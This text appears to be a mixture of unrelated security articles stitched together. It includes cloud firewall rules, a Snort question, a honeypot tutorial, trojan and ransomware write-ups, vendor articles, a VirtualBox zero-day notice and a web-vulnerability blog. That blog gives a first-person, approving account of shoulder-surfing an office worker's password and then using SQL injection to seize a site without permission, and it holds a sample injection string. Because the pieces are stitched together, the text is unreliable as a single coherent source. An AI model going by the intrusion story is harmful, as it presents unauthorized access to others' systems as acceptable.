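To make the segmentation and least-privilege ideas from the Azure IaaS section concrete, here is a hedged sketch using the Azure CLI (the resource names and address range are placeholders, not a prescribed configuration). It creates an NSG rule that admits management traffic only from one small, trusted subnet; everything else is denied by the NSG's default rules:

az network nsg rule create \
  --resource-group rg-zerotrust \
  --nsg-name nsg-app-tier \
  --name AllowMgmtSSH \
  --priority 100 \
  --direction Inbound \
  --access Allow \
  --protocol Tcp \
  --source-address-prefixes 10.10.0.0/24 \
  --destination-port-ranges 22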
[Snort-users] Detecting DDoS attacks with Snort Ana Serrano Mamolar B00315494 at ...17757... Mon Jan 23 05:25:57 EST 2017 I am a beginner with Snort. For my research, I would like to use Snort to detect DDoS attacks. So, what I have done is, first, install Snort and download DDoS rules from here: https://github.com/eldondev/Snort/blob/master/rules/ddos.rules. Then, I tried to generate some traffic that matches some of these rules to see if Snort triggered alerts. I started to use Scapy and I managed to generate ICMP and UDP DoS attacks, but not TCP for the moment, and not distributed, just DoS. I am also open to new ideas about the issue of generating traffic to simulate my attacks (pcaps would also be suitable). My main worry, and the aim of this message, is that I am not sure I have understood well how Snort rules work. I don't understand why I am getting one alert per packet sent. So, if I send 2000 packets matching a rule, I receive 2000 alerts. As far as I know, a DDoS attack attempts to overload systems, so one packet is not a DoS attack. So, does somebody know how I should do a real experiment? Maybe those rules are not good for detecting an attack? Maybe I am not running Snort in the proper mode? Thanks in advance
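For reference: Snort's detection_filter rule option can collapse flood traffic so a rule fires only after a packet-rate threshold is crossed, rather than once per packet. A hedged sketch (the SID, count and time window below are arbitrary examples, not values from the linked ruleset):

# Fire only once a single source exceeds 1000 UDP packets in 10 seconds
alert udp $EXTERNAL_NET any -> $HOME_NET any ( \
    msg:"Possible UDP flood"; \
    detection_filter: track by_src, count 1000, seconds 10; \
    sid:1000001; rev:1;)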
Operational Complexity: The Biggest Security Threat to Your AWS Environment Managing tightly-controlled user access in AWS is too complex and leads to errors and sloppiness. There are six main reasons for this: 1. User access is IP-centric, and users’ IP addresses change 2. Dynamic environments cause extra administrative burdens 3. Complexity leads to shortcuts 4. Forced use of VPN connectivity to manage access control 5. Logging correlation complexities 6. AWS shared responsibility model adherence AWS makes it clear that security is a shared responsibility. While AWS is responsible for security ‘of’ the cloud, you’re responsible for what’s ‘in’ the cloud. So we turn to AWS Security Groups, but they introduce operational complexity with negative consequences. In our new eBook, Operational Complexity: The Biggest Security Threat to Your AWS Environment, we discuss some of the challenges with either wide-open access or tightly-controlled access in AWS. Both have consequences, so what do you do? Here’s an example of one of those challenges: Four users access the Amazon environment from a known source. Their public IP address is the known source. The security groups are configured appropriately. The challenge comes when users try to access from other locations. You can learn what new security model overcomes this challenge inside the eBook. Check out the eBook to learn more about the changes you’ll need to make to your AWS security moving forward.
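To make the IP-centric pattern concrete, here is a hedged sketch using the AWS CLI (the group ID and address are placeholders): a typical Security Group rule pins access to one user's known public IP, and it silently stops working the moment that user connects from a different network.

aws ec2 authorize-security-group-ingress \
  --group-id sg-0123456789abcdef0 \
  --protocol tcp \
  --port 443 \
  --cidr 203.0.113.25/32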
Author: Mayank Sharma A honeypot is software that attracts hostile activity by masquerading as a vulnerable system. While it’s running, the honeypot gathers information about attackers and their techniques and patterns. Honeypots distract crackers from more valuable machines on a network, and provide early warning about attacks and exploitation trends. LaBrea was conceived in the aftermath of the Code Red worm attack in July 2001, when software developer Tom Liston posted an idea on the INTRUSIONS list at incidents.org for a means of combatting the constant scanning of his IP addresses and ports. A port scan is a method used by crackers to determine which ports are open or in use on a system in a network. Using various tools, a cracker can send data to TCP or UDP ports one at a time. Based on the response received, the port scan utility determines whether that port is in use. The cracker uses this information to focus his efforts to exploit weaknesses on the ports that are open. Liston’s idea got a positive response from Mihnea Stoenescu, who used a modified version of a comprehensive security program called Couic. Tom hacked Couic for his purpose and called it CodeRedneck. He further improved CodeRedneck to fake machines with fake vulnerabilities — in essence creating the honeypot which he now called LaBrea. LaBrea keeps a watch to see if someone is trying to find a free IP address on your network. LaBrea looks for address resolution protocol (ARP) requests without any ARP replies to see whether an IP is in use. When LaBrea sees this behavior, it assumes a cracker is port-scanning your system, and it creates an ARP reply with a bogus MAC address and sends it back to the requester. This helps determine the IP address of the port scanner. LaBrea then listens to all incoming traffic to the bogus MAC address it just created. To convince the attacker that he is talking to a real machine, LaBrea allows TCP connections. The cracker sends a SYN (synchronize) packet, which is acknowledged with a SYN/ACK (acknowledgment). You can configure LaBrea to keep track of its activity in a log file or display it on your screen. Please note that there are legal implications in some countries for using honeypots. For instance, some countries have laws against wiretapping, and in one sense, implementing a honeypot can be seen as a serious violation of wiretapping law. Setting it up As root, first install the libdnet RPM: rpm -i libdnet-1.7-0.1.fc2.dag.i386.rpm Next extract the LaBrea tarball and install it: tar -zxvf labrea-2.5-stable-1.tar.gz cd labrea ./configure --with-libdnet=/usr make make install LaBrea also needs to be run as root. LaBrea has lots of switches. Understand which ones to use for better results. For instance: labrea -i eth1 -o -v -z This invokes LaBrea in verbose (-v) mode, sending all the log info to stdout (standard output) instead of syslog (-o). To specify which interface LaBrea listens on, use the -i switch. The -z option turns off nag messages that your LAN cards might not support. Testing the setup To test your new software, find a machine on your network and try to ping an unused local IP address. After three ‘Request timed out’ messages you should start getting a response. You can increase or decrease the time period that LaBrea takes to respond using the appropriate switch. On the machine you just set up, you’ll see the IP address of the machine from which the ping originated. Now for the real stuff. Run Nessus on a free IP address. It’ll find the address as valid.
On my network it reported security holes and security warnings on my unoccupied IP! Nmap showed more than 2,000 open ports and the services running on the virtual machine! A honeypot like LaBrea is a useful security tool that complements intrusion detection systems and firewalls. Mayank Sharma is a freelance technology writer and FLOSS migration consultant in New Delhi, India. Author: Chris Preimesberger In fact, DaimlerChrysler proved that it had complied with the original contract by certifying its use of Unix System V code with SCO Group 11 weeks (on April 6, 2004) before Michigan Judge Rae Lee Chabot’s dismissal of most of the case on July 21. DaimlerChrysler IT manager Norman Powell did this by attesting that no SCO-owned code had been used in DaimlerChrysler’s shop for more than seven years, and thus there were no CPUs to be counted. (With thanks to Pam Jones at Groklaw; see DaimlerChrysler’s Motion for Summary Dismissal, dated April 15, 2004.) DaimlerChrysler: Full compliance with agreement “DaimlerChrysler has provided SCO with a certification that complies with the express requirements of Section 2.05 (of the original contract with AT&T Information Systems),” the company said on Page 24 of its 54-page Motion for Summary Dismissal. “Specifically, the DaimlerChrysler letter provides SCO with the required information about Designated CPUs (explaining that none are in use); certifies that an authorized person reviewed DaimlerChrysler’s use; and states that no software product licensed under the subject agreement is being used or has been used in more than seven years, and as a result, there is full compliance with the provisions of the subject agreement,” DaimlerChrysler said. SCO Group then accepted DaimlerChrysler’s certification response, company spokesman Blake Stowell told NewsForge. In effect, an out-of-court agreement was reached, although it was not made public. At this point, SCO Group could have dropped the litigation, but its counsel elected not to do so. “We’re satisfied that DaimlerChrysler did finally certify their compliance with the existing software agreement,” SCO’s Stowell said. Then why didn’t SCO Group drop the suit, after its customer (DaimlerChrysler) offered its explanation of compliance on April 6? “One of the reasons our lawyers decided to pursue the case is that I think they wanted to investigate further whether DaimlerChrysler had any possible misuse of our code within Linux in their systems,” Stowell said on Monday. However, the SCO lawyers’ plan backfired when Judge Chabot stuck to the letter of the contract, which dealt strictly with certification of Unix System V code usage. As it turned out, DaimlerChrysler “was not obligated to tell us anything about their use of Linux,” Stowell said. More litigation to come? Will SCO Group continue its investigation into whether DaimlerChrysler is somehow misusing proprietary Unix code in its Linux systems? “I don’t know,” Stowell said. “I can’t answer that. It’s up to our lawyers.” For this particular case, SCO Group retained the Southfield, Mich., firm of Seyburn, Kahn, Ginn, Bess and Serlin. A call to case lead attorney Joel Serlin Monday afternoon was not returned to NewsForge.
Detroit-based DaimlerChrysler spokeswoman Mary Gauthier, who did not return calls requesting comment today, told ComputerWorld on July 21 — the day of the judgment — that “we are pleased with the judge’s ruling, and we look forward to finally resolving the one open issue.” Stowell said he does not believe SCO Group will pursue the final point in the Michigan case that is still open — that SCO Group wants to know why DaimlerChrysler didn’t respond to the certification request in a reasonable amount of time. In fact, DaimlerChrysler responded to SCO on April 6 — about a month after the lawsuit was filed — explained its legal point of view, and offered certification information. This information is all included in the motion filed on April 15. That meant DaimlerChrysler took about three and a half months to respond to SCO’s first letter of Dec. 18, 2003, requesting an accounting of its Unix System V code. Author: JT Smith “Back in December iCanProgram.com announced that it would be offering its online “Introduction to Linux Programming” courses without fees in return for a voluntary donation to Cancer Research by the participants. These donations were made in memory of one of our founding partners who lost her own battle with Cancer last summer. This “learning for charity” formula has been a success far beyond our expectations. We have now offered our courses under this format to over 350 students worldwide. For those of you who missed out the first time round there are still openings in the 2 remaining courses that will be offered in the 2002 spring session. The 02 Apr edition of the Introduction to Linux Programming course has room. The 02 Apr edition of our newest advanced Linux Programming course titled Linux Programming the SIMPL way has room as well. Thanks once again to all those who have participated so far and given so generously to the cause of fighting Cancer.” Author: JT Smith “This article is a follow-up to an article entitled The Myth of Open Source Security Revisited. The original article tackled the common misconception amongst users of Open Source Software (OSS) that OSS is a panacea when it comes to creating secure software. The article presented anecdotal evidence taken from an article written by John Viega, the original author of GNU Mailman, to illustrate its point. This article follows up the anecdotal evidence presented in the original paper by providing an analysis of similar software applications, their development methodology and the frequency of the discovery of security vulnerabilities.”
SAM: The Static Analysis Module of the MAVERIC Mobile App Security Verification Platform The tremendous success of the mobile application paradigm is due to the ease with which new applications are uploaded by developers, distributed through the application markets (e.g. Google Play), and finally installed by the users. Yet, the very same model is causing serious security concerns, since users have little or no means to ascertain the trustworthiness of the applications they install on their devices. To protect their customers, Poste Italiane has defined the Mobile Application Verification Cluster (MAVERIC), a process for the systematic security analysis of third-party mobile apps that leverage the online services provided by the company (e.g. home banking, parcel tracking). We present SAM, a toolkit that supports this process by automating a number of operations, including reverse engineering, privilege analysis, and automatic verification of security properties. We introduce the functionalities of SAM through a demonstration of the platform applied to real Android applications.
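For a flavor of the operations listed above, here is a hedged sketch using common open-source tooling (apktool and aapt are real tools; the APK name is a placeholder, and this is illustrative rather than SAM's actual pipeline):

apktool d banking-app.apk -o decoded/     # reverse engineering: decode resources and smali code
aapt dump permissions banking-app.apk     # privilege analysis: list the permissions the app requests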
Fake video project 3d • 2010 The best examples of how to play with viewers’ perception are fake videos showing impossible situations, like cars driving up ski-jumps. They could be real, they could be fake, but in any case they are fun. With this kind of concept in mind, we were to make our own videos. Faked security cams at different places all around the campus should catch strange occurrences, which were finally streamed at the “Beuth Box”. Tasks: storyboarding, 3D-modelling, 3D-animation, rendering. In team with: Annika Wenzel.
Google Play, the most trusted source for downloads on the mobile OS platform, has now been caught cataloguing applications that contain a trojan: a program that performs malicious actions on your device without your consent. Cybersecurity analysts from Doctor Web have come across applications containing a trojan programmed to work as an Android bot, Android.Circle.1, to perform malicious tasks. The multifunctional bot, Android.Circle.1, gains people's trust by hiding under the names of seemingly harmless applications. These harmless-looking applications fall under the categories of image collections, horoscope programs, applications for online dating, photo editors, games and system utilities on Google Play; according to experts from Doctor Web, the trojan has over 18 modifications and over 700,000 downloads. Android.Circle.1 is written in Kotlin and is created using the Multiple APK mechanism to support a variety of devices. Some examples of such applications are as follows: HOW THIS TROJAN OPERATES? The trojan embedded in these applications divides the main APK into several APK files, with some of the malicious functions performed by Android.Circle.1 taken from the library libnative-lib.so, which is located in one of the auxiliary APKs. The Android OS perceives the collection as a single application, so the Multiple APK mechanism acts as a self-defense mechanism for this trojan. Once successfully installed, the trojan communicates with the command and control (C&C) server via secure HTTPS, with traffic additionally encrypted using the AES algorithm. The trojan disguises itself as a standard Android application in the list of installed programs, presenting itself under the name com.google.security. The first task performed by the trojan is to send the following information to the server:
- packages – list of installed applications;
- device_vendor – device manufacturer;
- sRooted – root access;
- install_referrer – information about the link where the application was installed;
- version_name – a constant with a value of “1.0”;
- app_version – a constant with a value of “31”;
- google_id – user identifier in Google services;
- device_model – device model;
- device_name – device name;
- push_token – Firebase identifier;
- udid – unique identifier;
- os_version – version of the operating system;
- sim_provider – mobile operator.
After sending this information, the trojan waits for commands in the form of messages from the Firebase Cloud Messaging service. The server replies with BeanShell script commands, and these instructions are saved in the prefs.xml configuration file. The BeanShell scripts are executed with the help of the open-source BeanShell library built into the trojan via libnative-lib.so; BeanShell is a Java code interpreter that allows Java-based code to be executed. Some of the tasks performed by the bot are as follows:
- remove the trojan application icon from the software list in the main screen menu;
- remove the trojan application icon and load the link specified in the command in a web browser;
- perform a click on a loaded site;
- show banner ads.
From the above tasks, it is clear that displaying ads and luring the user into the attacker's trap are the attacker's main intentions.
Through ads, the attacker is able to load malicious websites for phishing attacks, even though it is against Google Play's terms and conditions to execute any third-party code. The trojan displays ads as: Despite these basic functions, the bot can also load and execute any code based on the instructions it receives from the server, though it is restricted by the device configuration. There are some indicators and affected applications of this trojan network: Though all the detected modifications of Android.Circle.1 have been removed from Google Play, there is a chance that attackers will place new versions on it.
- Scan applications with an antivirus before installing them.
- Do not click on third-party links in installed apps or enter any sensitive information on such links.
- Do not click on the ads displayed in the app.
RSU is a security researcher who is constantly working to make the world a more secure place to live. He works day and night in the cyber security area.
Nostro Ransomware Removal Guide Nostro Ransomware Description and Removal Instructions: Malware Category: Ransomware Nostro Ransomware is an updated version of the GarrantyDecrypt crypto-ransomware virus. Nostro Ransomware targets PCs running the Windows OS. Every file that has been encrypted will have its extension changed to .NOSTRO. Unfortunately, there is still no way of decrypting the files encrypted by Nostro Ransomware. The distribution of Nostro Ransomware is related to installing third-party toolbars, all kinds of free software, files from P2P networks and torrents, randomly clicking on ads, pop-up windows and banners, downloading attached files from your personal e-mail inbox or other file-sharing applications, and bogus Flash Player and fake video software for viewing online content. When running, Nostro Ransomware will start encrypting certain types of files stored on local or mounted network drives using RSA-2048 public-key cryptography, with the private key stored only on a control server. Nostro Ransomware will create #RECOVERY_FILES#.txt and put a shortcut to it in every folder where a file was encrypted. Those files contain instructions explaining how to pay the ransom. For the victims to pay the ransom, the virus asks them to contact the creators at the following e-mail address: [email protected]. When Nostro Ransomware is initiated on the computer, it will inject deep into the system, infecting Explorer.exe and svchost.exe, modify the registry to start with Windows, and disable the Automatic Repair feature. Once active, it will start the process of encrypting files. These types of ransomware are very hard to detect. Nevertheless, the virus will show its presence after the encryption finishes. Nostro Ransomware will not just encrypt files and block your computer; it will also collect valuable information that will be sent to the control servers. Such software could lead to more malware coming onto your computer and even cause a loss of data. Such threats are not to be underestimated! *Please note that, still, there is no way of decrypting the files encrypted by Nostro Ransomware. The infection may also delete all your Restore Points. Thus, the only way to restore will be by using a backup copy. How To Remove: There is an automatic removal, using a specialized software suite like SpyHunter (recommended for novice users and fast removal), or a manual removal method (recommended for experts), using your own skills to remove the infection. Automatic Nostro Ransomware Removal: We recommend using the SpyHunter Malware Security Suite. You can download and install SpyHunter to detect Nostro Ransomware and remove it. SpyHunter will automatically scan and detect all threats present on your system. Learn more about SpyHunter, or if you want, check out the Install Instructions. SpyHunter's free diagnosis offers free scans and detection. You can remove the detected files, processes and registry entries manually, by yourself, or purchase the full version to perform an automatic removal and also to receive free professional help for any malware-related queries from the technical support department. *Note that the removal of the virus will NOT decrypt your files. Still, there is no way of decrypting the files encrypted by Nostro Ransomware. Manual Nostro Ransomware Removal: *Please note that you should proceed at your own risk. Some incorrectly taken actions might lead to loss of data or destroy your system. Therefore, the manual removal is strongly recommended for experts only.
For everyday users, SpywareTechs.com recommends using SpyHunter or any other reputable security solution. 1. Remove Nostro Ransomware by Restoring Your System to a Previous State: 1. Restart your PC into Safe Mode with Command Prompt. To do that, turn your machine off and then start it up again. Then, when the first POST screen appears (white text), start tapping the F8 key repeatedly. ***For Windows 8/10: If you are using Windows 8/10, you need to hold the Shift button and tap the F8 key repeatedly; this should load the new advanced “recovery mode”, where you can choose the advanced repair options to show up. On the next screen, you will need to click on the Troubleshoot option, then select Advanced Options and select Windows Startup Settings. Click on the Restart button, and you should now be able to see the Advanced Boot Options screen. 2. Use the arrow keys on your keyboard to select the option “Safe Mode with Command Prompt” and hit “Enter”. 3. When the command prompt loads, type the following: Windows XP: C:\windows\system32\restore\rstrui.exe and press Enter Windows Vista/7/8/10: C:\windows\system32\rstrui.exe and press Enter 4. System Restore should start up. You will see a list of restore points. Try to use a restore point created just before the date and time the problem occurred. When System Restore completes, start your PC in Normal mode. Then, perform a scan using anti-spyware software like SpyHunter, as there could still be some infections left on your system. *Please note that your files may remain encrypted, depending on whether your System Files Protection is set to recover only system settings or the system settings along with the previous versions of the files. 2. Files and Registry entries associated with Nostro Ransomware:
This procedure will specifically allow a known bad website to display its content. Caution: This procedure overrides the blocking of a known bad website. Viewing the site may be harmful to your computer. Proceed with caution. To unblock a website using Manage Allowed Websites: 1. Click Manage Allowed Websites. 2. Click Add Website. 3. Type in the domain URL. Example: google.com (not www.google.com) 4. Tap the Enter key. Note: You can remove a website from the list later by clicking on the trash can. To unblock a website using Antivirus History: 1. Click View History under Antivirus History, then click the Blocked Websites tab. 2. Click Allow next to the blocked URL to unblock it. Note: You can block it again by removing it from the Manage Allowed Websites list.
Why Data Security Posture Management Paves the Way Forward for Effective Data Security - By Karthik Krishnan - Oct 07, 2022 Enterprises are struggling with three key data challenges. First, there is massive growth in data, which often increases exponentially from year to year. Second, there is massive migration of data to the cloud. And finally, the data that is worth protecting has become very complex: from intellectual property to financial data to business-confidential information to regulated PII/PCI/PHI data. All of these factors present unique challenges to data security. Traditional ways of protecting data, such as writing rules to discover which data worth protecting users have, or relying on end users to ensure that data is shared with the right employees at all times, simply don't work in an environment such as the cloud, where it is now very easy for employees to create, modify and share sensitive content with anyone. Data Security Posture Management (DSPM) is emerging as a key technology area to solve these challenges. DSPM identifies and remediates risks to structured and unstructured data. It's an emerging security practice enabled by automated tools that make it possible to secure content at an atomic level without unnecessary overhead or new IT skills. And it's an enabling technology for a new, more dynamic approach to access management called purpose-based access control (PBAC). To understand DSPM, consider the similarly named Cloud Security Posture Management (CSPM) category. These solutions improve security by targeting cloud configuration errors, and they were a response to a spate of security breaches related to misconfigured Amazon S3 data storage buckets. Some of the most consequential misconfiguration incidents granted public access to sensitive data or caused the complete loss of administrative control for production cloud solutions. Like CSPM, DSPM also focuses on misconfigured access privileges that can lead to data loss. DSPM solutions, however, confront a more extensive and complex threat surface. A moderately complex cloud estate may house a few dozen storage instances and accounts for a handful of administrators. Contrast that threat surface with the complexity of an organization's entire collection of unstructured data, which can run to tens of millions of files, and that is what DSPM protects. Confronted with the volume and diversity of content needing to be managed and secured, most organizations simply leave data security up to their end users. Few organizations are comfortable with that risk, but the rise of automated DSPM solutions offers some hope. They offer four capabilities essential to robust data protection:
- Content discovery and categorization that provides the proper context for evaluating security best practices
- Detection of access misconfigurations, inappropriate sharing, and risky use of email or messaging services
- Evaluation of risks associated with data access and use
- Risk remediation with the flexibility to tailor actions to suit business requirements
Unlike CSPM, where protected assets – storage buckets, administrative interfaces, online applications, and the like – are well-defined and understood, user-created data is far more complex. Content categories range from valuable source code and intellectual property to regulated customer information and sensitive strategic documents. Accordingly, content discovery and accurate, granular categorization are essential precursors to effective DSPM.
But categorization can require a significant initial investment and substantial ongoing maintenance. The two most common approaches, user-applied document tags and rule-based automation, lack the scalability and accuracy necessary for workable categorization.

Detecting misconfigured access settings, overshared files, or the use of risky channels (like personal email) is even more challenging. Why? Because even with highly accurate data categorization, hard and fast rules about who can and cannot view a specific data category usually don't exist. It is a high-stakes problem: over-constrained data can quickly impact business operations and agility, while overshared data is a potential security risk. Striking the right balance between access and security is critical.

Of course, simply finding at-risk data isn't enough to protect it. Assessing risk, remediating misconfigured access permissions, and fixing sharing errors complete the DSPM cycle. There is no magic bullet: different organizations have different definitions of what is critical, what is trivial, and what is at risk. Evaluating and quantifying risk gives focus to the process of fixing it. Work on the big stuff. Ignore the trivial. Know the difference.

All these tasks (categorizing content, detecting misconfigurations, and analyzing risk) can be completed accurately in DSPM solutions using deep learning technologies. With deep learning, the data, along with related information about storage and usage, tells a rich and valuable security story. Advanced deep learning solutions autonomously categorize data, then compare access configurations, storage locations, and data handling practices across similar files to spot and assess risk. It is the future of DSPM.

It is also critical to do this with an easy deployment model that:

- Is API-based and agentless, deploys in 5-10 minutes, and provides results in days rather than months
- Works across unstructured and structured data
- Handles petabytes of data without requiring large security teams
- Operates as a SaaS solution

Data Security Posture Management protects your organization from data loss and breaches. Understanding your data, assessing risk, and remediating overly permissive access to sensitive information is at the heart of DSPM. Accurate, autonomous DSPM forms the foundation for more effective access control and overall data security.
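To make the "work on the big stuff" idea concrete, here is a minimal, hypothetical sketch of an oversharing risk score. The record fields (sensitivity, shared_with, link_public) and the weights are invented for illustration; they are not taken from any DSPM product's API.

```python
# Hypothetical sketch: ranking files by sharing risk. All field names and
# weights here are illustrative assumptions, not a real DSPM schema.
SENSITIVITY_WEIGHT = {"public": 0, "internal": 1, "confidential": 3, "regulated": 5}

def risk_score(record: dict) -> int:
    """Combine content sensitivity with exposure to prioritize remediation."""
    score = SENSITIVITY_WEIGHT.get(record["sensitivity"], 1)
    score *= 1 + len(record.get("shared_with", []))
    if record.get("link_public"):
        score *= 10  # anyone-with-the-link sharing dominates the risk
    return score

files = [
    {"name": "q3-board-deck.pptx", "sensitivity": "confidential",
     "shared_with": ["alice", "bob"], "link_public": True},
    {"name": "lunch-menu.txt", "sensitivity": "public", "shared_with": []},
]

# Work on the big stuff, ignore the trivial: sort by descending risk.
for f in sorted(files, key=risk_score, reverse=True):
    print(f["name"], risk_score(f))
```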
When two Palo Alto Networks firewalls are deployed in an active/passive cluster, the device priority must be configured. The device priority determines which firewall preferably takes the active role and which takes the passive role when both firewalls boot up for the first time. An option called "Preemption" influences this behavior depending on whether it is enabled or disabled.

When the Palo Alto Networks firewall cluster (primary and secondary) boots up for the first time, the device with the higher priority (lower numerical value) takes the active role and the device with the lower priority (higher numerical value) takes the passive role, regardless of whether the Preemption option is enabled or disabled.

With Preemption Enabled

The Preemption option must be enabled on both Palo Alto Networks firewalls. If the primary firewall fails, the secondary firewall takes the active role and starts to forward traffic. When the primary firewall comes back up, it immediately resumes the active role, since it is the device with the higher priority (lower numerical value).

With Preemption Disabled

If the primary firewall fails, the secondary firewall takes the active role and starts to forward traffic. When the primary firewall comes back up, it does not resume the active role even though it has a higher priority setting. The device that currently holds the active role, in this case the secondary firewall, remains the active firewall.

The device priority and Preemption are configured under Device > High Availability > General > Election Settings.

To summarize:
- During the first boot, the device with the lowest value (highest priority) becomes active.
- During the first boot, the device with the highest value (lowest priority) becomes passive.
- When Preemption is enabled and a device recovers after a failure, the device with the lowest value becomes active again.
- When Preemption is disabled, the device that currently holds the active role remains active, regardless of the configured priority.
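As an illustration of the election logic summarized above, here is a small Python model of the active/passive decision. This is a toy simulation for reasoning about the behavior, not PAN-OS code or configuration.

```python
# Toy model of the election behavior described above; illustrative only.
def active_after_recovery(current_active: str, priorities: dict, preemption: bool) -> str:
    """Which device is active once the failed peer has rejoined the cluster?

    priorities maps device name -> numeric priority (lower value wins).
    """
    if preemption:
        # The highest-priority device (lowest numerical value) reclaims the role.
        return min(priorities, key=priorities.get)
    # Without preemption, whoever currently holds the active role keeps it.
    return current_active

priorities = {"primary": 50, "secondary": 100}

# Scenario: primary failed, secondary took over, primary has now recovered.
print(active_after_recovery("secondary", priorities, preemption=True))   # -> primary
print(active_after_recovery("secondary", priorities, preemption=False))  # -> secondary
```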
4 Common Web Vulnerabilities to Fix

Secure your website from hackers

I would say that without websites, the Internet would be close to useless for most Internet users. So lots of websites get developed, and lots of websites get exploited. Vulnerabilities exist in the places where developers don't care enough to check. But a malicious hacker knows how to think like a developer too 😉 . Here are a few vulnerabilities that are not caught easily by developers and therefore don't get fixed. If you have a website, or are planning to get one, tell your developer to keep an extra eye on these while developing!

Parameterized URLs are more open to attack

When developers build a site, they often don't take the extra care to use REST-style URLs. A vulnerability may exist anywhere on your site, but if the site uses a server-side language like PHP, ASPX, or JSP with URL parameters, a hacker gets a bit happier, because those parameters give him some confidence to attempt injection-type attacks, and such sites are often vulnerable. Developers often forget to check specific inputs, let alone all the URLs :). http://pusheax.com/vuln.php?variable=value is more interesting to an attacker than http://pusheax.com/vuln/variable/value. An injection attack is still possible against the latter, but it is harder for new hackers. If developers don't want to deal with .htaccess, they should always write code carefully and scan for vulnerabilities.

SQLi, XSS, and code execution after users log in

Many developers like easy coding and tend to trust registered users. They sometimes forget that a hacker can be one of their users too, and a hacker knows where a developer is likely to skip secure coding. I have seen many websites with REST-style URLs where, after logging in, everything is passed in parameters (http://pusheax.com/vuln.php?variable=value). Most of them were vulnerable to SQL injection and XSS. Some developers were clever enough to build the site without parameters, but they forgot to secure the forms, such as the search form, and that form was often vulnerable to SQL injection. Data can be extracted comfortably with SQL injection in a protected area; in these situations Burp Suite has been handy for me. If XSS is found, it may be easy to phish the other users, including the admin, through private messages, because users trust each other 🙂 and there are many reasons for that trust. Code execution is a powerful attack that can give full control of the system. I have found fewer code execution vulnerabilities, but they still exist in the protected areas of some websites. An experienced hacker focuses largely on POST-based injection in the target's protected area.

Unusual error messages lead to further attacks

Many websites, even high-profile ones, are not configured properly. Wrong input causes unusual error messages to be displayed, which give away valuable information such as paths, usernames, software versions, and much more. A hacker can learn a lot about the target from these error messages. Using this information, an attacker can exploit the login page or find Local File Inclusion or Remote File Inclusion vulnerabilities, which can do major damage to your website. You should handle error messages carefully to prevent attackers from learning about your site.

Internal users are unaware

I once got full control of a web database through social engineering combined with SQL injection. Let me tell you the story 🙂 . I often visited an office (you can guess what kind of office it might be), and I had a good relationship with the office employees.
I challenged them that I would get free services from them. They accepted! Then I told them I was just having fun with them, and they forgot about my challenge. For a few days I explored their site: no vulnerability found. I only found a URL where internal users could log in, but three failed tries locked the account (crazy, they are scared of hackers). I decided to try social engineering. I was sure they wouldn't click a link, so in-person social engineering was the only way. I visited their office again and ordered a service. From where I stood I could see his keyboard and, clearly, his finger movements, so I watched him type. When I ordered the service, he logged in to that site to enter the order. Bad luck for him: I memorized his finger movements. He typed the password very carefully and slowly, because a wrong try might lock his account, lol, so some of the characters were visible too. Within 24 hours I tried 8 wrong passwords, and the 9th try succeeded. After logging in, everything was secure except the search form, which was vulnerable to error-based SQL injection, and that led me to take control of the full website.

I know my English is not that of a native speaker, but I have tried to express these points to help you secure your website. If you take care of these 4 web security issues, I am sure your website will have some extra protection and will be harder for a hacker to break into. Thanks for reading!
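A closing note on the SQL injection findings above: the standard defense is parameterized queries. Below is a minimal sketch using Python's built-in sqlite3 module; the table and the payload are made up for demonstration, and the same placeholder pattern applies to PHP's PDO or any other database API.

```python
# Minimal sketch of the parameterized-query defense against SQL injection.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'alice')")

user_input = "alice' OR '1'='1"  # a classic injection payload

# Vulnerable pattern: string concatenation puts attacker input into the SQL.
#   query = "SELECT * FROM users WHERE name = '" + user_input + "'"

# Safe pattern: placeholders keep data out of the SQL grammar entirely.
rows = conn.execute("SELECT * FROM users WHERE name = ?", (user_input,)).fetchall()
print(rows)  # [] -- the payload is treated as a literal string, not as SQL
```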
A zero-day vulnerability has been identified in VirtualBox that can be exploited to allow malware to escape from the virtual machine guest to the host machine. The security researcher Sergey Zelenyuk publicly released his findings on November 6th without notifying VirtualBox, meaning that no security patch is available at the time of publishing. Temporary mitigation measures were also released by Sergey (see What you should do about it). At this time, successful exploitation requires advanced technical skills to develop and chain together with additional privilege escalation exploits. This vulnerability does not affect type-1 hypervisors, meaning cloud environments are not impacted. For these reasons, widespread adoption/exploitation is not expected in the near term.

Virtual machines (VMs) are emulations of an operating system, which allow users to run multiple separate operating systems on one physical device. Escaping the sandbox refers to malware, opened on the virtual machine, circumventing this separation and affecting the underlying operating system. Virtual systems are designed to be separate from the underlying system and are often used for malware analysis. If escape is possible, the threat actor gains access to more information on the host machine, and there is a higher chance of lateral movement to additional machines.

This zero-day vulnerability only affects the type-2 hypervisor of VirtualBox virtual machines. Type-2 hypervisors are generally used for desktop machines, meaning that cloud environments are not affected.

Sergey chose to release this vulnerability without notifying VirtualBox due to disagreements with the handling of vulnerability reporting and bug bounties, notably the amount of time that passes before companies act on reported issues.

GitHub: MorteNoir1/virtualbox_e1000_0day VirtualBox E1000 Guest-to-Host Escape
In light of the increasingly sophisticated attacks against the US public and private sectors, the Biden Administration announced a push toward Zero Trust Architecture, amid other cybersecurity reforms. The White House order was issued on May 12, and it included a host of measures aimed at improving the country's resilience against cyberthreats.

The announcement contained plans to remove barriers that block the sharing of threat information, as well as actions to modernize the Federal Government cybersecurity environment. A key part of the order was a requirement for each agency head to develop a plan for Zero Trust Architecture implementation within 60 days of the announcement. This plan must incorporate the migration steps set out in the National Institute of Standards and Technology's (NIST) guidelines. The White House order also stipulates that migrations to cloud technology "shall also adopt Zero Trust Architecture, as practicable."

This announcement is likely to have major implications in the cybersecurity world. With the federal government moving to adopt Zero Trust Architecture, it's likely that other industries will soon follow suit. It's worth asking what this framework is and what it means in the context of your own security stance.

What Is Zero Trust Architecture?

Simply put, Zero Trust Architecture is a security model that assumes no place is safe from cyberthreats, even an organization's own network. Let's explain it by contrasting Zero Trust Architecture with other security models.

Under other designs, an organization's network has a perimeter, and the entities inside it are considered secure. It's much like the terminal at an airport. Once you have gone through the security checkpoint, you are presumed free from any weaponry that could endanger others or the facility. After going through security, you can enter the food court, the gift shops, or the bathroom without having to verify your identity or go through a metal detector. Under this type of security model, systems can communicate with each other within the network relatively freely. Users are deemed safe and given special privileges, because they are on the "secure" side of the firewall.

In contrast, Zero Trust Architecture accepts that bad actors may be inside the perimeter of the "secure" network. Recognizing this possibility, the Zero Trust security model involves making the secure perimeter as small as possible to minimize the potential for compromise. It also takes steps to continually evaluate actors that are inside the network for possible threats.

